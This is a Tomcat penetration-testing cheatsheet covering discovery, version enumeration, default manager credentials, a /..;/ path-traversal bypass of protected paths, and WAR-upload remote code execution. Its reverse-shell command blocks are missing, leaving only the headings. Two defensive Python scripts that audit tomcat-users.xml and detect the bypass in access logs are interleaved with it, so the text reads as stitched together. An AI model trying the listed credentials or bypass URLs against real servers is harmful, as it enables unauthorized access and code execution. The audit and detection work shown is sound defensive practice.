Tomcat
Discovery
Typically Apache Tomcat runs on port 8080
Common Tomcat error:

Enumeration
Version Identification
You can find the version of Apache Tomcat by going to the /doc/ directory
Manager Files Location
Identifying the /manager and /host-manager directories is crucial. Their names may have been changed, so perform a directory brute force to locate them.
Username Enumeration
Apache Tomcat <6.0.0 username enumeration is possible through
Default Credentials
The /manager/html directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:
admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
These credentials can be tested using:
Another notable directory is /manager/status, which displays the Tomcat and OS version, aiding in vulnerability identification.
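The default-credential and manager-exposure points above can be checked on the defensive side from the configuration itself. The following script is an added example, not code from the original page or from the Tomcat project: it scans a tomcat-users.xml for exactly the credential pairs listed above, for weak or over-privileged manager accounts, and checks the manager application's META-INF/context.xml for the RemoteAddrValve that Tomcat ships to limit who can reach /manager. The XML documents embedded in it are constructed samples, and the 12-character minimum is an assumed local policy rather than a Tomcat default.

```python
"""Audit Tomcat manager configuration for the weaknesses described above.

Added example, not code from the original page. It scans a tomcat-users.xml
for the default credential pairs listed above and for weak or over-privileged
manager accounts, and checks the manager application's META-INF/context.xml
for the RemoteAddrValve that Tomcat ships to restrict who can reach /manager.
All file contents below are constructed samples, not from a real deployment.
"""
import xml.etree.ElementTree as ET

# Credential pairs listed on the page as commonly tried defaults.
DEFAULT_CREDS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}
# Roles that grant access to /manager or /host-manager functionality.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumed local policy, not a Tomcat default

# Constructed sample tomcat-users.xml (Tomcat 8+ puts a namespace on it).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
  <user username="deploy" password="Gq7!xP9#mL2@vB4w" roles="manager-script"/>
</tomcat-users>
"""

# Manager context.xml with the address restriction removed (constructed).
OPEN_CONTEXT = '<Context antiResourceLocking="false" privileged="true"/>'

# Manager context.xml as Tomcat ships it: only loopback clients are allowed.
RESTRICTED_CONTEXT = r"""<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>
"""


def _local(tag):
    """Strip an XML namespace prefix such as '{http://tomcat.apache.org/xml}'."""
    return tag.rsplit("}", 1)[-1]


def audit_users(xml_text):
    """Return a list of findings for a tomcat-users.xml document."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, pw) in DEFAULT_CREDS:
            findings.append(f"user '{name}': default credential pair ({name}:{pw})")
        elif roles & PRIVILEGED_ROLES and (pw == name or len(pw) < MIN_PASSWORD_LEN):
            findings.append(f"user '{name}': weak password on privileged account")
        # Tomcat's manager docs advise not granting manager-script or
        # manager-jmx to an account that also holds manager-gui.
        if "manager-gui" in roles and roles & {"manager-script", "manager-jmx"}:
            findings.append(f"user '{name}': holds manager-gui together with a script/JMX role")
    return findings


def audit_manager_context(xml_text):
    """Return findings for the manager app's META-INF/context.xml."""
    for valve in ET.fromstring(xml_text).iter("Valve"):
        if valve.get("className", "").endswith("RemoteAddrValve") and valve.get("allow"):
            return []
    return ["manager context: no RemoteAddrValve allow-list, reachable from any client address"]


if __name__ == "__main__":
    for finding in audit_users(SAMPLE_TOMCAT_USERS):
        print("tomcat-users.xml:", finding)
    for finding in audit_manager_context(OPEN_CONTEXT):
        print("context.xml:", finding)
```

Run against the sample, it reports the tomcat:s3cr3t default pair, the GUI-plus-script role combination on that account, and the viewer account's password equal to its username; the restricted context.xml passes while the open one is flagged. Pointing it at a real CATALINA_BASE/conf/tomcat-users.xml and webapps/manager/META-INF/context.xml is a quick way to confirm none of the pairs listed above are live.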
Path Traversal Exploit
In some vulnerable configurations of Tomcat you can reach protected directories by inserting the path segment /..;/
So, for example, you might be able to reach the Tomcat manager page by requesting: www.vulnerable.com/lalala/..;/manager/html
Another way to bypass protected paths with the same trick is to request http://www.vulnerable.com/;param=value/manager/html
Remote Code Execution
If you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).
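Both the /..;/ bypass described above and WAR deployment through the manager leave distinctive traces in the access log, and the bypass itself comes down to a normalisation mismatch: Tomcat treats ";" as the start of a path parameter within a segment and discards it before mapping the request, so "..;" becomes ".." and is resolved, whereas a front-end proxy that matches the literal string "/manager" never sees a match. The following detector is an added example, not code from the original page or from any tool it mentions. It normalises each request path the way Tomcat does, flags requests whose literal path avoids /manager or /host-manager but whose Tomcat view lands inside them, flags deployment actions through the manager's upload form and text interface, and counts repeated 401s against the manager per client. The log lines are constructed samples in the combined access-log format; the threshold of five failures is an assumption.

```python
"""Detect manager access via Tomcat's path-parameter quirk, WAR deployments
through the manager, and repeated manager auth failures, from access logs.

Added example, not code from the original page. Log lines are constructed.
"""
import posixpath
import re

PROTECTED = ("/manager", "/host-manager")
# Manager URIs that change deployed content: the HTML upload form and the
# text interface's deploy command (used with PUT for a WAR body or GET with
# a war= parameter).
DEPLOY_ACTIONS = {
    ("POST", "/manager/html/upload"),
    ("PUT", "/manager/text/deploy"),
    ("GET", "/manager/text/deploy"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: five failed logins, two bypass attempts (one with a
# deployment behind it), a ';param=' bypass, a benign request and a text-
# interface deployment from an internal host.
LOG_LINES = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '203.0.113.7 - - [10/Mar/2024:10:01:10 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 200 15821',
    '203.0.113.7 - - [10/Mar/2024:10:01:40 +0000] "POST /lalala/..;/manager/html/upload HTTP/1.1" 302 0',
    '198.51.100.4 - - [10/Mar/2024:10:02:00 +0000] "GET /;param=value/manager/html HTTP/1.1" 200 15821',
    '192.0.2.10 - - [10/Mar/2024:10:02:30 +0000] "GET /docs/ HTTP/1.1" 200 5000',
    '10.0.0.5 - - [10/Mar/2024:10:03:00 +0000] "PUT /manager/text/deploy?path=/revshell HTTP/1.1" 200 60',
]


def tomcat_view(target):
    """Return the path as Tomcat maps it: query dropped, ';...' path
    parameters stripped from every segment, empty segments removed, then
    '.' and '..' resolved."""
    path = target.split("?", 1)[0]
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    segments = [seg for seg in segments if seg]
    return posixpath.normpath("/" + "/".join(segments))


def is_protected(path):
    """Literal prefix match, the way a naive proxy rule would check it."""
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)


def analyse(log_lines, guess_threshold=5):
    """Return (client, alert, request) tuples in log order."""
    alerts = []
    failures = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target = m["ip"], m["method"], m["target"]
        status = int(m["status"])
        literal = target.split("?", 1)[0]
        mapped = tomcat_view(target)
        if is_protected(mapped) and not is_protected(literal):
            alerts.append((ip, "path-parameter bypass", target))
        if (method, mapped) in DEPLOY_ACTIONS and status < 400:
            alerts.append((ip, "WAR deployment via manager", target))
        if is_protected(mapped) and status == 401:
            failures[ip] = failures.get(ip, 0) + 1
            if failures[ip] == guess_threshold:
                alerts.append((ip, "repeated manager auth failures", f"{guess_threshold} x 401"))
    return alerts


if __name__ == "__main__":
    for ip, alert, request in analyse(LOG_LINES):
        print(f"{ip:15} {alert:30} {request}")
```

The point of computing both views is that a proxy rule written against the literal path and Tomcat's own mapping disagree on exactly the requests the bypass relies on; alerting on that disagreement catches the technique regardless of which padding segment precedes the "..;". Deployment alerts are emitted only for successful or redirected responses, since Tomcat's upload form answers a completed upload with a 302 back to the manager page.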
MSFVenom Reverse Shell
Create the war to deploy:
Upload the revshell.war file and access it (/revshell/):
Bind and reverse shell with tomcatWarDeployer.py
In some scenarios this doesn't work (for example old versions of sun)